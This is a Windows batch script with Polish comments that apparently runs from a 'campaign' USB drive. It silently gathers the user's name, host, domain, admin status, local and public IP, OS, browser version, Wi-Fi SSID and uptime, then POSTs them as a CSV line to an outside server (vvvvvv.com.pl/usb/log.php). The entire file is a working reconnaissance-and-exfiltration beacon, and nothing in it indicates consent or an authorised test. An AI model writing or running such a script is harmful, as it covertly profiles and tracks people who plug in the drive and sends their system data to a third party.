@echo off
setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION

REM === 🎯 Identyfikator nośnika / kampanii ===
set "RID=usb01-1"
set "ROLE=18"

REM === 🕒 Czas ===
set "TIMESTAMP=%DATE%_%TIME%"

REM === 👤 Użytkownik / 💻 Komputer / 🏢 Domena ===
set "USER=%USERNAME%"
set "HOST=%COMPUTERNAME%"
set "DOMAIN=%USERDOMAIN%"

REM === 🔐 Uprawnienia admina ===
set "ADMIN=user"
whoami /groups | find "S-1-5-32-544" >nul && set "ADMIN=admin"

REM === 🌐 IP lokalny ===
set "IP_LOCAL=brak"
for /f "tokens=2 delims=:" %%a in ('ipconfig ^| findstr /C:"IPv4"') do (
    set "ipraw=%%a"
    set "ipraw=!ipraw: =!"
    echo !ipraw! | findstr /C:"192.168." >nul && set "IP_LOCAL=!ipraw!"
)

REM === 🌍 IP publiczny ===
set "IP_PUBLIC=brak"
for /f %%p in ('curl -s ifconfig.me') do set "IP_PUBLIC=%%p"

REM === 🧠 System operacyjny ===
set "OS=brak"
for /f "tokens=*" %%a in ('ver') do (
    set "OS=%%a"
)

REM === 🌐 Przeglądarka ===
set "BROWSER=brak"
reg query "HKLM\Software\Microsoft\Edge\BLBeacon" /v version >nul 2>&1 && (
    for /f "tokens=3" %%v in ('reg query "HKLM\Software\Microsoft\Edge\BLBeacon" /v version') do set "BROWSER=Edge %%v"
)
reg query "HKLM\Software\Google\Chrome\BLBeacon" /v version >nul 2>&1 && (
    for /f "tokens=3" %%v in ('reg query "HKLM\Software\Google\Chrome\BLBeacon" /v version') do set "BROWSER=Chrome %%v"
)

REM === 📶 SSID ===
set "SSID=brak"
for /f "tokens=2 delims=:" %%a in ('netsh wlan show interfaces ^| findstr /i "SSID" ^| findstr /v "BSSID"') do (
    set "SSID=%%a"
    set "SSID=!SSID: =!"
)

REM === ⏱️ Uptime systemu ===
set "SESDUR=brak"
for /f "tokens=2,* delims= " %%a in ('net stats workstation ^| findstr /C:"Statystyka od"') do (
    set "SESDUR=%%a %%b"
)

REM === 🔄 Kompresja jako CSV-linia ===
set "LINE=%RID%,%ROLE%,%TIMESTAMP%,%USER%,%HOST%,%IP_LOCAL%,%IP_PUBLIC%,%OS%,%DOMAIN%,%ADMIN%,%BROWSER%,%SSID%,%SESDUR%"

REM === 📡 Wysłanie danych ===
curl -s -X POST -H "Content-Type: application/x-www-form-urlencoded" ^
     -d "data=%LINE%" ^
     https://vvvvvv.com.pl/usb/log.php

exit
